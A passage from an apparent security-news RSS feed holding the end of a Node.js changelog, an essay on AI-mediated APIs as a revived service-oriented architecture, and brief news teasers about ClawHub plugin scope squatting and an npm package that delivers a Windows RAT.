<li>[<a href="https://github.com/nodejs/node/commit/9dafe1d2d8"><code>9dafe1d2d8</code></a>] - <strong>test</strong>: avoid flaky restart sync in debugger exceptions test (Yuya Inoue) <a href="https://github.com/nodejs/node/pull/62055" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62055/hovercard">#62055</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/989b2de973"><code>989b2de973</code></a>] - <strong>test</strong>: avoid initial-break wait in restart-message (inoway46) <a href="https://github.com/nodejs/node/pull/62060" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62060/hovercard">#62060</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/a072a25ee7"><code>a072a25ee7</code></a>] - <strong>test</strong>: move FFI tests to <code>NATIVE_SUITES</code> (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63165" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63165/hovercard">#63165</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/64efbfd878"><code>64efbfd878</code></a>] - <strong>test</strong>: use ERM to destroy sqlite database handles after tests (René) <a href="https://github.com/nodejs/node/pull/63076" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63076/hovercard">#63076</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7dee66cd94"><code>7dee66cd94</code></a>] - <strong>test_runner</strong>: dont buffer unordered events in process isolation mode (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63432" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63432/hovercard">#63432</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d257eec1e3"><code>d257eec1e3</code></a>] - <strong>test_runner</strong>: fix --test-rerun-failures swallowing failures on retry (Chemi Atlow) <a href="https://github.com/nodejs/node/pull/63431" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63431/hovercard">#63431</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/288c320e2f"><code>288c320e2f</code></a>] - <strong>test_runner</strong>: show replayed-from-attempt hint in spec reporter (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63429" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63429/hovercard">#63429</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/904bdf5bb4"><code>904bdf5bb4</code></a>] - <strong>test_runner</strong>: preserve run duration when using test-rerun (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63429" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63429/hovercard">#63429</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/df183d7bfa"><code>df183d7bfa</code></a>] - <strong>test_runner</strong>: avoid hanging on incomplete v8 frames (Ali Hassan) <a href="https://github.com/nodejs/node/pull/62704" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62704/hovercard">#62704</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ec86c69726"><code>ec86c69726</code></a>] - <strong>test_runner</strong>: fix diagnostics channel context tracking (Moshe Atlow) <a href="https://github.com/nodejs/node/pull/63283" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63283/hovercard">#63283</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/94e5f63b83"><code>94e5f63b83</code></a>] - <strong>tls</strong>: add unsupported renegotiation error (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63161" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63161/hovercard">#63161</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/06d308fb61"><code>06d308fb61</code></a>] - <strong>tools</strong>: prevent lib code from reading KeyObject and CryptoKey accessors (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2e4a0d0c91"><code>2e4a0d0c91</code></a>] - <strong>tools</strong>: bump brace-expansion from 5.0.5 to 5.0.6 in /tools/eslint (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/63415" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63415/hovercard">#63415</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9666b366"><code>4c9666b366</code></a>] - <strong>tools</strong>: skip commit-lint on backport pull requests (Marco) <a href="https://github.com/nodejs/node/pull/63378" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63378/hovercard">#63378</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/67d0c490a8"><code>67d0c490a8</code></a>] - <strong>tools</strong>: fix skip of <code>test-internet</code> on forks (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63492" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63492/hovercard">#63492</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/02f73c7cac"><code>02f73c7cac</code></a>] - <strong>tools</strong>: bump the eslint group in /tools/eslint with 4 updates (dependabot[bot]) <a href="https://github.com/nodejs/node/pull/63075" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63075/hovercard">#63075</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/5d016d3241"><code>5d016d3241</code></a>] - <strong>tools</strong>: update gyp-next to 0.22.2 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63374" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63374/hovercard">#63374</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/55af0f0edb"><code>55af0f0edb</code></a>] - <strong>tools</strong>: fix test426 updater (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63271" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63271/hovercard">#63271</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d8475e167a"><code>d8475e167a</code></a>] - <strong>tools</strong>: use different branch for tool updates on staging branches (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63110" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63110/hovercard">#63110</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/c605df9e50"><code>c605df9e50</code></a>] - <strong>util</strong>: remove unused functions (Antoine du Hamel) <a href="https://github.com/nodejs/node/pull/63612" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63612/hovercard">#63612</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/fe4540ebdb"><code>fe4540ebdb</code></a>] - <strong>util</strong>: create hex style cache and fast path (Guilherme Araújo) <a href="https://github.com/nodejs/node/pull/62999" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62999/hovercard">#62999</a></li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Principal Drift]]></title>
<description><![CDATA[Over the past year I’ve reviewed enterprise agent architectures at roughly two dozen organizations, including banks, retailers, healthcare systems, and a couple of regulators. The architecture diagrams have been reliably impressive. There are boxes for the MCP gateway, the tool registry, the vect...]]></description>
<link>https://tsecurity.de/de/3617942/ai-nachrichten/principal-drift/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617942/ai-nachrichten/principal-drift/</guid>
<pubDate>Tue, 23 Jun 2026 12:33:42 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Over the past year I’ve reviewed enterprise agent architectures at roughly two dozen organizations, including banks, retailers, healthcare systems, and a couple of regulators. The architecture diagrams have been reliably impressive. There are boxes for the MCP gateway, the tool registry, the vector store, the orchestrator, the policy engine, and the observability stack. There are […]]]></content:encoded>
</item>
<item>
<title><![CDATA[How fuzzy APIs are remaking the web]]></title>
<description><![CDATA[For nearly as long as the web has existed, web development has wrestled mightily with the right way to connect components over the network. This is the question of the remote API. It influences every aspect of the software we build. We sort of arrived at a tolerable compromise with JSON APIs. Whi...]]></description>
<link>https://tsecurity.de/de/3617682/ai-nachrichten/how-fuzzy-apis-are-remaking-the-web/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3617682/ai-nachrichten/how-fuzzy-apis-are-remaking-the-web/</guid>
<pubDate>Tue, 23 Jun 2026 11:03:56 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For nearly as long as <a href="https://home.cern/science/computing/the-birth-of-the-web/short-history-web/" data-type="link" data-id="https://home.cern/science/computing/the-birth-of-the-web/short-history-web/">the web has existed</a>, web development has wrestled mightily with the right way to connect components over the network. This is the question of the remote <a href="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2269032/what-is-an-api-application-programming-interfaces-explained.html">API</a>. It influences every aspect of the software we build. We sort of arrived at a tolerable compromise with JSON APIs. While these have their limitations, you have to appreciate their underlying simplicity.</p>



<p>But the advent of AI-enabled endpoints that can mediate intent is changing the basic workings of the internet. This change is gradually reawakening an old dream, the service-oriented architecture (SOA). This time around, with luck, we’ll finally gain the flexible, discoverable, and maintainable automated service discovery we’ve longed for. Fingers crossed.</p>



<h2 class="wp-block-heading">Why old-school SOA failed </h2>



<p>Let’s call this burgeoning influence of AI on web architecture SOA 2.0.</p>



<p>To understand why SOA 2.0 is different from <a href="https://www.infoworld.com/article/2158174/what-is-service-oriented-architecture.html" data-type="link" data-id="https://www.infoworld.com/article/2158174/what-is-service-oriented-architecture.html">SOA 1.0</a>, we have to remember the trauma of the 2000s. (This may be painful but also cathartic.) The original dream of SOA was beautiful: a world where disparate business services—inventory, billing, shipping, you name it—could automatically discover each other, understand capabilities, and orchestrate complex tasks without human intervention.</p>



<p>To achieve this, we built a monument to complexity. We had SOAP (Simple Object Access Protocol) for messaging, WSDL (Web Services Description Language) to define contracts, and UDDI registries for service discovery. At the center of it all sat the Enterprise Service Bus (ESB), a massive piece of middleware that was supposed to route everything gracefully, seamlessly. In case you young’uns are confused, that is all based on XML.</p>



<p>By the time you were done understanding the infrastructure well enough to know how to do something, you had forgotten what you set out to do.</p>



<p>It failed. It was egregiously heavy. Just to do some simple thing like create a “New Item” endpoint, you immediately had to begin scaling a wall of rigid definitions.</p>



<p>Because computers historically required absolute, deterministic perfection, if a single XML tag in a SOAP envelope was missing, or if a service updated its WSDL without every client re-generating its stubs, the entire multi-million-dollar pipeline would violently unravel. Some of us may be familiar with a similar challenge in containerized <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html" data-type="link" data-id="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices</a> (like Kubernates), where trying to determine where in the mesh a problem originated is… awkward.</p>



<p>Classic SOA was a house of cards, too brittle to survive the fuzzy reality of the internet.</p>



<p>The typical JSON API of today is a reaction against SOA. (It may be an overreaction.) We abandoned SOA for the relative simplicity of <a href="https://www.infoworld.com/article/2334742/what-is-rest-the-de-facto-web-architecture-standard.html" data-type="link" data-id="https://www.infoworld.com/article/2334742/what-is-rest-the-de-facto-web-architecture-standard.html">REST</a>, giving up on the dream of autonomous service orchestration in exchange for manual integrations that <em>just work.</em></p>



<h2 class="wp-block-heading">The new intention-to-execution middleware</h2>



<p>A sea change is already happening with app-level architecture. </p>



<p>The effect of AI endpoints in an app’s service profile goes beyond just a new capability. It changes how the rest of the services work together. The overall effect is something like the app gaining an understanding of itself, and what it can do. This is not dissimilar to what WSDL was supposed to accomplish. But instead of a hard-coded descriptor, where some person had to keep what was available and what was described in sync, you now have a layer that can accept dynamically produced descriptors and unite them with fuzzy user intention and produce meaningful action.</p>



<p>You tie in AI endpoints to bridge between what the user is trying to accomplish, with the various strict capabilities available. These capabilities may exist within the app at the back end, at the front end, or at another service layer. The main thing is that there is a flexible AI layer that mitigates the need to hard-code the links between services.</p>



<p>In classic SOA, the contract was a rigid, unforgiving WSDL document. In modern common practice, the contract is a strongly coupled RESTful endpoint. In SOA 2.0, the contract has a hitherto unknown degree of flexibility, thanks to the natural language capabilities of an LLM.</p>



<p>When a user or a system expresses an intent—say, “Provision a new staging environment for the billing service”—the AI middleware doesn’t look for a hard-coded, point-to-point integration. Instead, it digests the intent and performs semantic routing, consulting a registry and selecting the appropriate tools. That registry, rather than a heavy UDDI, might be a vector database of available internal API endpoints, or a collection of available functions. </p>



<p>Modern LLMs equipped with function-calling capabilities act as the ultimate dynamic orchestrators. They read the JSON schema of a target REST API, understand its parameters, and dynamically map the user’s fuzzy, unstructured intent into a perfectly formatted JSON payload. If a field is missing, the LLM can either infer it from context or pause execution to ask the user for clarification.</p>



<p>The brittleness of SOA 1.0 is replaced by a shock absorber. If the target API changes a parameter name from <code>customerID</code> to <code>clientId</code>, the AI middleware can read the updated schema and adjust its mapping on the fly. No client code needs to be recompiled. No stubs need to be regenerated. The multi-million-dollar pipeline survives.</p>



<h2 class="wp-block-heading">When software becomes smart</h2>



<p>These are not just abstract ideas. I recently did my taxes, using a popular mainstream service that I will not name. I had several unusual and grumpy areas to deal with, including the new crypto regulations. It was not pretty.</p>



<p>But what I was most struck by was how dumb the software was, compared to the AI chatbot I was using to help guide me. I wanted to be able to tell the (stupid) software what I was trying to do. Such as “Carry my NOL from last year!” Or “I don’t know if I need a schedule K, you tell me!”</p>



<p>I don’t want another chatbot. I mean, I already have a good chatbot. I want the application to be well-integrated with AI services that understand the app, understand my current situation within the app, and meet me at the level of intent, applying the lessons learned by others who have used the same tools.</p>



<p>This kind of targeted, intelligent leveling up of intention is, from all I can see, the next stage of software development, and it is going to be massive.</p>



<h2 class="wp-block-heading">Latency, non-determinism, and other challenges</h2>



<p>We are trading the deterministic brittleness of classic SOA for the probabilistic fuzziness of SOA 2.0. And that trade is going to be demanded with ever more insistence by users. But it comes with a new set of trade-offs. </p>



<p>First, there is the latency tax. The old enterprise service bus was heavy to configure, but at run time, the messaging was just routed XML. Injecting an LLM into the critical path of an application adds hundreds of milliseconds, if not seconds, of latency. For asynchronous tasks or complex orchestrations, this is a welcome trade-off. For real-time, high-throughput microservices, it is a deal-breaker.</p>



<p>Second, there is the problem of non-determinism. We spent decades training ourselves (and our systems) to expect that given input A, a system will always produce output B. That deterministic equation was our bottom line faith. The intent layer doesn’t work that way. An LLM might route a request beautifully 99 times, then hallucinate a parameter on the 100th. Or it might choose an entirely different execution path based on a subtle shift in the user’s phrasing.</p>



<p>A third fly in the ointment is the so-called non-functional requirements, or NFRs. These are your pesky sidebar issues that refuse to be ignored, like security and reliability. </p>



<p>Security concerns are magnified by model capabilities like function calling (or “function passing”). If you pair a user’s desires with what the AI can do, and you then let the AI decide, what happens next is clearly an act of faith unless guardrails are put in place. These guardrails must go beyond typical web security (i.e., make sure important function calls are hardened on the server, not exposed on the client) and must be internalized by the AI or (more likely) imposed from a layer outside the AI. There are a number of ways to do this, varying in degree of power and complexity. </p>



<p>We certainly will continue to use standard practices (like RBAC and SSO) to enforce authentication. We will continue to implement standard authorization techniques (like OAUTH and JWT). But we will bring these to bear in the context of that intent layer and its capabilities.</p>



<p>Reliability is another challenge. For example, I recently hit a snag with Google’s Imagen API. Everything was working beautifully, then suddenly, some of the images stopped generating. There were no errors in the client or server logs; however, there were 500 errors in the network. Upon deeper examination, the prompting had morphed (between app context and user content) to include what the Imagen API rules deemed to be dangerous content. This was not obviously flagged prompting. It was fairly pedestrian creative writing, along the lines of “A dark, surreal, and glitchy cyberpunk landscape with menacing figures….” That kind of thing.</p>



<p>These are some of the ways that even simple, direct use of LLM APIs can surprise you. The question I am mulling is, what will be the unexpected outcomes on software writ large?</p>



<h2 class="wp-block-heading">Dawn of a probabilistic web</h2>



<p>Since its inception, the unpredictable, probabilistic nature of the internet came primarily from the humans using it (and background radiation flipping transistors, network failures, geopolitical effects on the ground, and the like). But AI-mediated APIs introduce an intentional, semantically controlled form of probability.</p>



<p>As developers, we will naturally discover the techniques that make consuming AI endpoints more effective. Here I am thinking about practices like structured responses and function calling. But the larger question is, what will the nature of software become?</p>



<p>In a world of binary states, strict protocols, and rigid URIs, if you send a <code>GET</code> request to a specific endpoint, you expect an exact, predictable response. We have spent the last 40 years treating the web like a vast, unimaginably complex state machine.</p>



<p>But as LLM-mediated APIs permeate our architecture with stochastics, the very fabric of the internet begins to change. By injecting AI into the routing and discovery layers, we are introducing a massive dose of probability into the foundation of our networks. When a request is no longer a hard-coded URI call but a natural language intent parsed by an LLM, the connection between node A and node B ceases to be a rigid wire. It becomes a weighted probability.</p>



<p>In essence, we are remaking the internet to mirror the architecture of the AI models we are deploying. Just as a neural network relies on the probabilistic firing of synapses rather than deterministic if/then statements, the next iteration of the web will rely on fluid, semantic discovery. Services won’t just “link” to each other; they will gravitate toward one another based on the conceptual proximity of their capabilities within a shared latent space. </p>



<p>This alters the character of software engineering. We lose (the illusion) of being entirely in control. Its strange paradox is that engineering using explicitly probabilistic components may make for a more resilient system. There is a longstanding debate about the best metaphor for software development. For the longest time, the construction of a building always seemed to be an apt analogy, or perhaps the mechanics of a vehicle. But these days, the gardening or cultivation metaphor is looking ever more relevant.</p>



<p>Despite the challenges posed by inserting AI in the stack, we are finally circling back to the original promise of the early 2000s. This time, fingers crossed, we are equipped with the right tools for the job.</p>



<p>We tried to build autonomous service discovery using rigid logic and deterministic XML, and it collapsed under its own weight. Now, we are building it with neural networks that understand the “intent” behind the integration. We are still building middleware, but instead of an enterprise service bus, we are building an enterprise reasoning bus. </p>



<p>The era of manually hard-coding every integration between every microservice may be coming to a close. </p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[23 ClawHub Plugins Abuse Official Org Scopes to Impersonate Trusted AI Agent Tools]]></title>
<description><![CDATA[A new supply chain threat has surfaced in the AI agent ecosystem that is both subtle and serious. Researchers uncovered 23 plugins on the ClawHub registry published under official organizational scopes without any authorization from ClawHub or its parent project,…
Read more →
The post 23 ClawHub ...]]></description>
<link>https://tsecurity.de/de/3616714/it-security-nachrichten/23-clawhub-plugins-abuse-official-org-scopes-to-impersonate-trusted-ai-agent-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616714/it-security-nachrichten/23-clawhub-plugins-abuse-official-org-scopes-to-impersonate-trusted-ai-agent-tools/</guid>
<pubDate>Mon, 22 Jun 2026 23:35:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new supply chain threat has surfaced in the AI agent ecosystem that is both subtle and serious. Researchers uncovered 23 plugins on the ClawHub registry published under official organizational scopes without any authorization from ClawHub or its parent project,…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/23-clawhub-plugins-abuse-official-org-scopes-to-impersonate-trusted-ai-agent-tools/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/23-clawhub-plugins-abuse-official-org-scopes-to-impersonate-trusted-ai-agent-tools/">23 ClawHub Plugins Abuse Official Org Scopes to Impersonate Trusted AI Agent Tools</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows RAT Uses Encrypted HTTP C2 and Registry Persistence After npm Infection]]></title>
<description><![CDATA[A newly discovered malware campaign is targeting Windows systems through a deceptive package on the npm registry. Disguised as a legitimate CSS build tool, the malicious package quietly installs a full-featured Remote Access Trojan, or RAT, on developer machines. The…
Read more →
The post Windows...]]></description>
<link>https://tsecurity.de/de/3616713/it-security-nachrichten/windows-rat-uses-encrypted-http-c2-and-registry-persistence-after-npm-infection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616713/it-security-nachrichten/windows-rat-uses-encrypted-http-c2-and-registry-persistence-after-npm-infection/</guid>
<pubDate>Mon, 22 Jun 2026 23:35:43 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly discovered malware campaign is targeting Windows systems through a deceptive package on the npm registry. Disguised as a legitimate CSS build tool, the malicious package quietly installs a full-featured Remote Access Trojan, or RAT, on developer machines. The…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/windows-rat-uses-encrypted-http-c2-and-registry-persistence-after-npm-infection/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/windows-rat-uses-encrypted-http-c2-and-registry-persistence-after-npm-infection/">Windows RAT Uses Encrypted HTTP C2 and Registry Persistence After npm Infection</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows RAT Uses Encrypted HTTP C2 and Registry Persistence After npm Infection]]></title>
<description><![CDATA[A newly discovered malware campaign is targeting Windows systems through a deceptive package on the npm registry. Disguised as a legitimate CSS build tool, the malicious package quietly installs a full-featured Remote Access Trojan, or RAT, on developer machines. The attack is subtle, well-crafte...]]></description>
<link>https://tsecurity.de/de/3616654/it-security-nachrichten/windows-rat-uses-encrypted-http-c2-and-registry-persistence-after-npm-infection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616654/it-security-nachrichten/windows-rat-uses-encrypted-http-c2-and-registry-persistence-after-npm-infection/</guid>
<pubDate>Mon, 22 Jun 2026 23:09:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A newly discovered malware campaign is targeting Windows systems through a deceptive package on the npm registry. Disguised as a legitimate CSS build tool, the malicious package quietly installs a full-featured Remote Access Trojan, or RAT, on developer machines. The attack is subtle, well-crafted, and far more dangerous than it first appears. The infection begins […]</p>
<p>The post <a href="https://cybersecuritynews.com/windows-rat-uses-encrypted-http-c2/">Windows RAT Uses Encrypted HTTP C2 and Registry Persistence After npm Infection</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[23 ClawHub Plugins Abuse Official Org Scopes to Impersonate Trusted AI Agent Tools]]></title>
<description><![CDATA[A new supply chain threat has surfaced in the AI agent ecosystem that is both subtle and serious. Researchers uncovered 23 plugins on the ClawHub registry published under official organizational scopes without any authorization from ClawHub or its parent project, OpenClaw. These plugins used trus...]]></description>
<link>https://tsecurity.de/de/3616653/it-security-nachrichten/23-clawhub-plugins-abuse-official-org-scopes-to-impersonate-trusted-ai-agent-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3616653/it-security-nachrichten/23-clawhub-plugins-abuse-official-org-scopes-to-impersonate-trusted-ai-agent-tools/</guid>
<pubDate>Mon, 22 Jun 2026 23:09:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new supply chain threat has surfaced in the AI agent ecosystem that is both subtle and serious. Researchers uncovered 23 plugins on the ClawHub registry published under official organizational scopes without any authorization from ClawHub or its parent project, OpenClaw. These plugins used trusted namespace prefixes to look like genuine, first-party tools, while they […]</p>
<p>The post <a href="https://cybersecuritynews.com/23-clawhub-plugins-abuse-official-org-scopes/">23 ClawHub Plugins Abuse Official Org Scopes to Impersonate Trusted AI Agent Tools</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Merge PR #3373: v0.8.64 security and release integration]]></title>
<description><![CDATA[Land the verified v0.8.64 release candidate.
Verification before merge:

PR checks green: CI, Web Frontend, CodeQL, GitGuardian, macOS, Windows, ubuntu, version drift, npm wrapper smoke, mobile runtime smoke.
Open code-scanning alerts for PR #3373: 0 after inspected false-positive dismissals.
Loc...]]></description>
<link>https://tsecurity.de/de/3615964/downloads/merge-pr-3373-v0864-security-and-release-integration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615964/downloads/merge-pr-3373-v0864-security-and-release-integration/</guid>
<pubDate>Mon, 22 Jun 2026 17:32:36 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Land the verified v0.8.64 release candidate.</p>
<p>Verification before merge:</p>
<ul>
<li>PR checks green: CI, Web Frontend, CodeQL, GitGuardian, macOS, Windows, ubuntu, version drift, npm wrapper smoke, mobile runtime smoke.</li>
<li>Open code-scanning alerts for PR <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4713067614" data-permission-text="Title is private" data-url="https://github.com/Hmbown/CodeWhale/issues/3373" data-hovercard-type="pull_request" data-hovercard-url="/Hmbown/CodeWhale/pull/3373/hovercard" href="https://github.com/Hmbown/CodeWhale/pull/3373">#3373</a>: 0 after inspected false-positive dismissals.</li>
<li>Local gates passed: check-versions, cargo fmt, git diff --check, provider registry check, codewhale-config tests, focused symlink/session tests, and release build.</li>
</ul>
<p>Release boundary explicitly approved by Hunter on 2026-06-22.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[RIPE abandons cloud-first strategy over geopolitical risk]]></title>
<description><![CDATA[RIPE NCC, the regional internet registry serving Europe, the Middle East, and parts of Asia, has abandoned its cloud-first strategy over concerns about geopolitical risk from dependence on US-based cloud providers. This article has been indexed from CyberMaterial Read the…
Read more →
The post RI...]]></description>
<link>https://tsecurity.de/de/3615827/it-security-nachrichten/ripe-abandons-cloud-first-strategy-over-geopolitical-risk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615827/it-security-nachrichten/ripe-abandons-cloud-first-strategy-over-geopolitical-risk/</guid>
<pubDate>Mon, 22 Jun 2026 16:54:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>RIPE NCC, the regional internet registry serving Europe, the Middle East, and parts of Asia, has abandoned its cloud-first strategy over concerns about geopolitical risk from dependence on US-based cloud providers. This article has been indexed from CyberMaterial Read the…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/ripe-abandons-cloud-first-strategy-over-geopolitical-risk/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/ripe-abandons-cloud-first-strategy-over-geopolitical-risk/">RIPE abandons cloud-first strategy over geopolitical risk</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClawHub Scope Squatting Lets Plugins Masquerade as Official OpenClaw Integrations]]></title>
<description><![CDATA[A supply-chain weakness in ClawHub’s plugin registry that allowed third-party packages to squat under organizational scopes and inherit first‑party credibility. In a catalog review Manifold found 23 code‑executing plugins published under the @openclaw/ and @clawhub/ scopes by accounts that have…
...]]></description>
<link>https://tsecurity.de/de/3615605/it-security-nachrichten/clawhub-scope-squatting-lets-plugins-masquerade-as-official-openclaw-integrations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615605/it-security-nachrichten/clawhub-scope-squatting-lets-plugins-masquerade-as-official-openclaw-integrations/</guid>
<pubDate>Mon, 22 Jun 2026 15:37:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A supply-chain weakness in ClawHub’s plugin registry that allowed third-party packages to squat under organizational scopes and inherit first‑party credibility. In a catalog review Manifold found 23 code‑executing plugins published under the @openclaw/ and @clawhub/ scopes by accounts that have…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/clawhub-scope-squatting-lets-plugins-masquerade-as-official-openclaw-integrations/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/clawhub-scope-squatting-lets-plugins-masquerade-as-official-openclaw-integrations/">ClawHub Scope Squatting Lets Plugins Masquerade as Official OpenClaw Integrations</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClawHub Scope Squatting Lets Plugins Masquerade as Official OpenClaw Integrations]]></title>
<description><![CDATA[A supply-chain weakness in ClawHub’s plugin registry that allowed third-party packages to squat under organizational scopes and inherit first‑party credibility. In a catalog review Manifold found 23 code‑executing plugins published under the @openclaw/ and @clawhub/ scopes by accounts that have n...]]></description>
<link>https://tsecurity.de/de/3615576/it-security-nachrichten/clawhub-scope-squatting-lets-plugins-masquerade-as-official-openclaw-integrations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3615576/it-security-nachrichten/clawhub-scope-squatting-lets-plugins-masquerade-as-official-openclaw-integrations/</guid>
<pubDate>Mon, 22 Jun 2026 15:24:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A supply-chain weakness in ClawHub’s plugin registry that allowed third-party packages to squat under organizational scopes and inherit first‑party credibility. In a catalog review Manifold found 23 code‑executing plugins published under the @openclaw/ and @clawhub/ scopes by accounts that have no verified relationship to either organization. Because ClawHub’s registry did not consistently enforce its documented […]</p>
<p>The post <a href="https://gbhackers.com/clawhub-scope-squatting/">ClawHub Scope Squatting Lets Plugins Masquerade as Official OpenClaw Integrations</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI Agent Supply Chain Risk Found in 23 ClawHub Plugins Using Official-Looking Namespaces]]></title>
<description><![CDATA[Manifold Security recently discovered 23 code-executing plugins on ClawHub that improperly used official organizational namespaces. These plugins were published under the @openclaw/ and @clawhub/ scopes by third-party accounts with no connection to the actual organizations. This discovery highlig...]]></description>
